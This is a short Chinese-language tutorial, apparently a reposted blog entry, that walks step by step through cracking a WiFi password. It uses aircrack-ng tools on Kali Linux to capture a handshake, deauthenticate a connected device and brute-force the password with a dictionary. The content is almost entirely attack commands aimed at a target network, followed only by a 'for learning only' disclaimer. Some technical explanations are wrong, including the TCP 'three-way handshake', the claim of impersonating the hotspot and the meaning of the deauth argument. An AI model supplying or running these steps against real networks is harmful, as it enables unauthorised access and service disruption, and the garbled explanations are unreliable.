所需工具:Kali Linux系统、无线网卡(免驱动)
需要用到的命令:
#查看网卡是否支持监听模式
airmon-ng
#开启网卡监听
airmon-ng start网卡名
#扫描附近WiFi
airodump-ng网卡名
#抓取握手包
airodump-ng--bssid WiFi的BSSID -c 信道频率 -w 抓包存储的路径 网卡名
#攻击已连接设备,使其掉线
aireplay-ng-0 信道频率 -a WiFi的BSSID -c 连接到WiFi的mac地址 网卡名
#字典爆破
aircrack-ng-w 密码字典 握手包路径
具体操作步骤:
步骤1:
插入 ***无线网卡 ***连接到Kali Linux
输入 **ifconfig **查看是否有网卡信息
步骤2:
输入 airmon-ng****start wlan0 开启监听模式
注意:开启后 网卡名字变成了 wlan0mon
步骤3:
输入airodump-ng** wlan0mon**扫描附近WiFi
步骤4:
输入 airodump-ng** --bassid 94:63:72:81:ED:CF -c 11 -w hack wlan0mon***** ***开始抓包
注意:若抓不到,可以攻击已经连接的设备使其掉线,设备会再自动连接,并在这个自动连接过程中会进行三次握手,会发出TCP包(里面包含加密的密码数据),我方伪装成WiFi热点去盗窃该数据包。我方盗窃后可用字典穷举法暴力破解加密的WiFi密码。(数据包里面的密码是哈希值加密的,哈希值加密只能正向)
输入 aireplay-ng -0 11 -a 94:63:72:81:ED:CF -c A4:50:46:E5:73:0C wlan0mon 开始攻击
注意:密码字典可以到网上下载,也可以自己生成
步骤5:
输入aircrack-ng-w** /root/pass.txt /root/hack-01.cap**开始暴力破解
>>> 密码破解成功 <<<
!!!仅供学习使用,切勿用于非法攻击!!!
版权归原作者 FatCat_BOY 所有, 如有侵权,请联系我们删除。